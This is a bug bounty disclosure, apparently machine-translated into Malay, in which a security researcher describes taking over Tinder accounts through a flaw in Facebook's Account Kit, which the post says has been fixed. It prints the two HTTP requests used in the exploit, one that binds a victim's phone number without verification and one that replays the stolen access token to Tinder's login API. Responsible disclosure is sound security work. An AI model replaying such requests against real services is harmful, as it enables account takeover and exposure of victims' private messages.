Bagaimana saya menggodam akaun Tinder menggunakan Kit Akaun Facebook dan memperoleh $ 6,250 dalam bentuk wang

Ini diterbitkan dengan kebenaran Facebook di bawah dasar pendedahan yang bertanggungjawab.

Kerentanan yang disebutkan dalam catatan blog ini dipasang dengan pantas oleh pasukan kejuruteraan Facebook dan Tinder.

Catatan ini adalah mengenai kerentanan pengambilalihan akaun yang saya dapati dalam aplikasi Tinder. Dengan mengeksploitasi ini, penyerang dapat memperoleh akses ke akaun Tinder korban, yang pasti menggunakan nombor telefon mereka untuk masuk.

Ini dapat dimanfaatkan melalui kerentanan dalam Kit Akaun Facebook , yang baru-baru ini ditangani oleh Facebook.

Aplikasi web dan mudah alih Tinder membolehkan pengguna menggunakan nombor telefon bimbit mereka untuk masuk ke perkhidmatan. Dan perkhidmatan log masuk ini disediakan oleh Account Kit (Facebook).

Pengguna mengklik Login dengan Nombor Telefon di tinder.com dan kemudian mereka diarahkan ke Accountkit.com untuk log masuk. Sekiranya pengesahan berjaya, maka Kit Akaun memberikan token akses ke Tinder untuk log masuk.

Menariknya, Tinder API tidak memeriksa ID pelanggan pada token yang disediakan oleh Account Kit.

Ini membolehkan penyerang menggunakan token akses aplikasi lain yang disediakan oleh Account Kit untuk mengambil alih akaun Tinder sebenar pengguna lain.

Huraian Kerentanan

Account Kit adalah produk Facebook yang membolehkan orang cepat mendaftar dan masuk ke beberapa aplikasi yang didaftarkan dengan hanya menggunakan nombor telefon atau alamat e-mel mereka tanpa memerlukan kata laluan. Ia boleh dipercayai, mudah digunakan, dan memberi pengguna pilihan mengenai bagaimana mereka ingin mendaftar ke aplikasi.

Tinder adalah aplikasi mudah alih berasaskan lokasi untuk mencari dan bertemu orang baru. Ini membolehkan pengguna menyukai atau tidak menyukai pengguna lain, dan kemudian meneruskan sembang jika kedua-dua pihak beralih ke kanan.

Terdapat kerentanan dalam Account Kit di mana penyerang dapat memperoleh akses ke akaun Kit Account pengguna mana pun hanya dengan menggunakan nombor telefon mereka. Setelah masuk, penyerang boleh mendapatkan token akses Kit Akaun pengguna yang terdapat dalam kuki mereka (aks).

Setelah itu, penyerang dapat menggunakan token akses (aks) untuk masuk ke akaun Tinder pengguna menggunakan API yang rentan.

Bagaimana eksploitasi saya berfungsi selangkah demi selangkah

Langkah 1

Mula-mula penyerang masuk ke akaun Kit Akaun mangsa dengan memasukkan nombor telefon mangsa di " new_phone_number " dalam permintaan API yang ditunjukkan di bawah.

Harap maklum bahawa Kit Akaun tidak mengesahkan pemetaan nombor telefon dengan kata laluan sekali sahaja. Penyerang boleh memasukkan nombor telefon sesiapa sahaja dan kemudian masuk ke akaun Kit Akaun mangsa.

Kemudian penyerang dapat menyalin token akses "aks" mangsa dari akaun Account Kit dari kuki.

API Kit Akaun yang terdedah:

POST / kemas kini / async / phone / confirm /? Dpr = 2 Host HTTP / 1.1 : www.accountkit.com new_phone_number = [nombor telefon vctim] & update_request_code = c1fb2e919bb33a076a7c6fe4a9fbfa97 [kod permintaan penyerang] & konfirmasi_code = 258822 __ kod = penyerang] 1 & __ dyn = & __ req = 6 & __ be = -1 & __ pc = PHASED% 3ADEFAULT & __ rev = 3496767 & fb_dtsg = & jazoest =

Langkah # 2

Sekarang penyerang hanya membalas permintaan berikut menggunakan token akses "aks" yang disalin ke dalam Tinder API di bawah.

Mereka akan masuk ke akaun Tinder mangsa. Penyerang pada dasarnya akan mempunyai kawalan penuh ke atas akaun mangsa. Mereka boleh membaca sembang peribadi, maklumat peribadi penuh, dan meleret profil pengguna lain ke kiri atau kanan, antara lain.

API Pengikat Rentan:

POST / v2 / auth / login / accountkit? Locale = en HTTP / 1.1

Hos: api.gotinder.com

Sambungan: tutup

Panjang Kandungan: 185

Asal: //tinder.com

versi aplikasi: 1000000

platform: web

Ejen Pengguna: Mozilla / 5.0 (Macintosh)

jenis kandungan: aplikasi / json

Terima: * / *

Rujuk: //tinder.com/

Terima-Pengekodan: gzip, kempis

Terima-Bahasa: en-US, en; q = 0.9

{"Token": "xxx", "id": ""}

Bukti Konsep Video

Garis Masa

Kedua-dua kelemahan itu diperbaiki oleh Tinder dan Facebook dengan cepat. Facebook memberi saya AS $ 5,000, dan Tinder menghadiahkan saya $ 1,250.

Saya pengasas AppSecure, sebuah syarikat keselamatan siber khusus dengan kemahiran bertahun-tahun yang diperoleh dan kepakaran yang teliti. Kami di sini untuk melindungi perniagaan dan data kritikal anda dari ancaman atau kerentanan dalam talian dan luar talian.

Anda boleh menghubungi kami di [email protected] atau [email protected]